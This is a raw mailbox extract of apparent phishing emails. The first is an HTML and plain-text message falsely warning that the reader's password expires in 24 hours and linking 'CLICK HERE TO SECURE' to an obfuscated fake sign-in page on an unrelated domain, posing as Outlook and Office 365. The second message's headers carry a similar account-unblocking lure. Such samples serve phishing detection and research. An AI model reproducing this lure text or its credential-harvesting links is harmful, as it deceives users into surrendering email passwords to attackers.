X-KLMS-AntiSpam-Envelope-From: robot@gela.ru
X-KLMS-AntiSpam-Rate: 0
X-KLMS-AntiSpam-Status: not_detected
X-KLMS-AntiSpam-Method: none
X-KLMS-AntiSpam-Info: LuaCore: 205 205 2f584fc5d437d92fc6aea7edaff39b944687648d, {rep_avail}, {Tracking_cat_updates, bb}, Sender-Category: Updates, Auth:dmarc=none header.from=gela.ru;spf=none smtp.mailfrom=gela.ru;dkim=none, DmarcAF: none
X-KLMS-AntiSpam-Interceptor-Info: scan successful
X-KLMS-AntiPhishing: Clean, 2018/10/30 11:41:27
X-KLMS-AntiVirus: Kaspersky Security 8.0 for Linux Mail Server, version 8.0.1.721, bases: 2018/10/31 00:02:00 #8852872; khse: 2015-01-01 01:01:01
X-KLMS-AntiVirus-Status: Clean, skipped
Status: O
X-Status: 
X-Keywords:                  
X-UID: 635

This is a multi-part message in MIME format

--tlUpHAatCkCuvLQWSe=_iXYRXNHSAuijhM0
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

 - This mail is in HTML. Some elements may be ommited in plain text. -

Dear User, Your Password Expires in 24 hours
Please follow this url to secure your account :
CLICK HERE TO SECURE
Alternative Option :
Outlook Web Users
Office 365
users
Password Policy :
* Minimum 8 Characters
* Complex Password : Capital letters, small letters, numeric, special =
characters (3 out of 4)
* Doesn't contain your name
This reminder will continue until you upgrade your account
Please do not reply to this email

--tlUpHAatCkCuvLQWSe=_iXYRXNHSAuijhM0
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD>
<BODY><SPAN style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal,=
"Segoe UI","Segoe WP",Tahoma,Arial,sans-serif,serif,EmojiFont; WHITE-S=
PACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FLOAT: none; FO=
NT-WEIGHT: 400; COLOR: rgb(33,33,33); FONT-STYLE: normal; DISPLAY: inl=
ine; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-=
INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal=
; text-decoration-style: initial; text-decoration-color: initial'>Dear=
 User, Your Password Expires in 24 hours</SPAN>=20
<H3 style=3D'FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Segoe WP",Tah=
oma,Arial,sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WORD-SPACIN=
G: 0px; TEXT-TRANSFORM: none; COLOR: rgb(33,33,33); FONT-STYLE: normal=
; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; t=
ext-decoration-style: initial; text-decoration-color: initial'><B>Plea=
se follow this url to secure your account :</B></H3>
<H3 style=3D'FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Segoe WP",Tah=
oma,Arial,sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WORD-SPACIN=
G: 0px; TEXT-TRANSFORM: none; COLOR: rgb(33,33,33); FONT-STYLE: normal=
; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; t=
ext-decoration-style: initial; text-decoration-color: initial'><A href=
=3D"http://maureencogginslaw.com/%40%23%40%23!%23%23%40%24%40%24%24%40=
%40!%23/Sign%20in%20doc.html" target=3D_blank data-saferedirecturl=3D"=
https://www.google.com/url?q=3Dhttps://aynrandsociety.org/!%2524%2525%=
2523%2540%2540%2524%2523%2540!%2524%2523%2523%2540%2524%2523/Sign%2520=
in%2520doc.html&amp;source=3Dgmail&amp;ust=3D1541010385779000&amp;usg=
=3DAFQjCNGt-DP7oX21jbCLKSFjRLK2i-EGrQ">CLICK HERE TO SECURE</A></H3>
<H3 style=3D'FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Segoe WP",Tah=
oma,Arial,sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WORD-SPACIN=
G: 0px; TEXT-TRANSFORM: none; COLOR: rgb(33,33,33); FONT-STYLE: normal=
; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; t=
ext-decoration-style: initial; text-decoration-color: initial'><B>Alte=
rnative Option :</B></H3>
<H3 style=3D'FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Segoe WP",Tah=
oma,Arial,sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WORD-SPACIN=
G: 0px; TEXT-TRANSFORM: none; COLOR: rgb(33,33,33); FONT-STYLE: normal=
; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; t=
ext-decoration-style: initial; text-decoration-color: initial'>Outlook=
 Web Users</H3>
<H3 style=3D'FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Segoe WP",Tah=
oma,Arial,sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WORD-SPACIN=
G: 0px; TEXT-TRANSFORM: none; COLOR: rgb(33,33,33); FONT-STYLE: normal=
; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; t=
ext-decoration-style: initial; text-decoration-color: initial'>Office =
365 <SPAN id=3Dm_3560746419676004532m_2438777240280785109m_20001141813=
54851699goog_558768516></SPAN><SPAN id=3Dm_3560746419676004532m_243877=
7240280785109m_2000114181354851699goog_558768517></SPAN>users</H3>
<H3 style=3D'FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Segoe WP",Tah=
oma,Arial,sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WORD-SPACIN=
G: 0px; TEXT-TRANSFORM: none; COLOR: rgb(33,33,33); FONT-STYLE: normal=
; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; t=
ext-decoration-style: initial; text-decoration-color: initial'><B>Pass=
word Policy :</B></H3>
<H5 style=3D'FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Segoe WP",Tah=
oma,Arial,sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WORD-SPACIN=
G: 0px; TEXT-TRANSFORM: none; COLOR: rgb(33,33,33); FONT-STYLE: normal=
; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; t=
ext-decoration-style: initial; text-decoration-color: initial'>* Minim=
um 8 Characters</H5>
<H5 style=3D'FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Segoe WP",Tah=
oma,Arial,sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WORD-SPACIN=
G: 0px; TEXT-TRANSFORM: none; COLOR: rgb(33,33,33); FONT-STYLE: normal=
; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; t=
ext-decoration-style: initial; text-decoration-color: initial'>* Compl=
ex Password : Capital letters, small letters, numeric, special charact=
ers (3 out of 4)</H5>
<H5 style=3D'FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Segoe WP",Tah=
oma,Arial,sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WORD-SPACIN=
G: 0px; TEXT-TRANSFORM: none; COLOR: rgb(33,33,33); FONT-STYLE: normal=
; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; t=
ext-decoration-style: initial; text-decoration-color: initial'>* Doesn=
't contain your name</H5>
<H3 style=3D'FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Segoe WP",Tah=
oma,Arial,sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WORD-SPACIN=
G: 0px; TEXT-TRANSFORM: none; COLOR: rgb(33,33,33); FONT-STYLE: normal=
; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; t=
ext-decoration-style: initial; text-decoration-color: initial'></H3>
<H3 style=3D'FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Segoe WP",Tah=
oma,Arial,sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WORD-SPACIN=
G: 0px; TEXT-TRANSFORM: none; COLOR: rgb(33,33,33); FONT-STYLE: normal=
; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; t=
ext-decoration-style: initial; text-decoration-color: initial'><B>This=
 reminder will continue until you upgrade your account<BR></B></H3>
<H3 style=3D'FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Segoe WP",Tah=
oma,Arial,sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WORD-SPACIN=
G: 0px; TEXT-TRANSFORM: none; COLOR: rgb(33,33,33); FONT-STYLE: normal=
; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; t=
ext-decoration-style: initial; text-decoration-color: initial'><B>Plea=
se do not reply to this email</B></H3><BR></BODY></HTML>

--tlUpHAatCkCuvLQWSe=_iXYRXNHSAuijhM0--


From jose@monkey.org Wed Oct 31 15:20:14 2018 +0000
Return-Path: servermessage@cgacaldara.com
Delivered-To: jose@monkey.org
X-FDA: 74779928748.12.wash46_1f31a97b0d14c
X-Spam-Summary: 70,1.5,0,c92028ab46567288,d41d8cd98f00b204,servermessage@cgacaldara.com,:,RULES_HIT:2:41:72:379:474:475:495:800:962:967:973:978:983:988:989:1189:1208:1221:1254:1260:1263:1313:1314:1381:1431:1433:1434:1436:1437:1516:1517:1518:1535:1567:1571:1575:1588:1589:1592:1594:1685:1714:1730:1777:1792:1801:2196:2199:2525:2527:2549:2560:2563:2610:2682:2685:2737:2859:2890:2891:2894:2910:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3865:3867:3868:3871:3889:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4049:4120:4321:4605:5007:6261:6653:6678:6703:7652:7809:7903:8516:8518:8568:8599:8603:8987:9025:9121:9149:9411:9416:9908:10004:10044:10128:10214:10346:11233:11473:11657:11658:11914:12043:12114:12219:12295:12438:12555:12740:12895:12903:12986:13025:13235:13237:13374:13439:13846:14096:14827:14877:18000:21080:21212:21433:21450:21451:21483:21524:21627:21810:21819:21838:30001:30021:30022:30026:30054:30058:30070:30074,0,RBL:50.28.55.162-irl.urbl.hostedemail.com
X-HE-Tag: wash46_1f31a97b0d14c
X-Filterd-Recvd-Size: 9822
Received: from nimbus2.mydomainbox.com (nimbus2.mydomainbox.com [50.28.55.162])
	by imf17.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 31 Oct 2018 15:20:14 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed;
	d=makhathiinsurance.com; s=default; h=Date:From:To:Subject:MIME-Version:
	Content-Type:Sender:Reply-To:Message-ID:Cc:Content-Transfer-Encoding:
	Content-ID:Content-Description:Resent-Date:Resent-From:Resent-Sender:
	Resent-To:Resent-Cc:Resent-Message-ID:In-Reply-To:References:List-Id:
	List-Help:List-Unsubscribe:List-Subscribe:List-Post:List-Owner:List-Archive;
	 bh=DDVlRldzappsyub73cXS17pckpQW3MmVCMREScX9IE0=; b=NJezIVJ4tO9JfFCcryHytxp/4
	c5UL6FE/+hpODlU6xzVP2kHojX6RT5PEsSWIV2laEaAxz/AGteXL63P3dmKh8RnvAd4ctPEI/WZtN
	btyCksEI1fuKgyvfI08grKP489i9SqqEVlHU5uZiKOfqN6QZaJbgYJ7S216IN0bSHBnORgZuE1azY
	AOcisoucc3IujdZUOXIhN/oKW0dhvItJSK9i/3PmgUURvzcuxToqSw5w31Zdqp4Bc8bIskpQt+g9f
	CvCsOy8olsu3IP7gfpnNLOxnTKyWJ9uAlMLwsZAqkNzRpKl7VLZAXpz2+PMm3bgyAbl3VgNy1qaKZ
	AfS49Vnkg==;
Received: from [51.254.229.20] (port=56379)
	by nimbus2.mydomainbox.com with esmtpa (Exim 4.91)
	(envelope-from <servermessage@cgacaldara.com>)
	id 1gHoQ8-000D9s-VL
	for jose@monkey.org; Wed, 31 Oct 2018 07:12:21 -0400
Content-Type: multipart/alternative; boundary="===============1855793060=="
MIME-Version: 1.0
Subject: (jose@monkey.org)Please Secure Your E-mail Account & Unblock Pending
 Messages 
To: jose@monkey.org
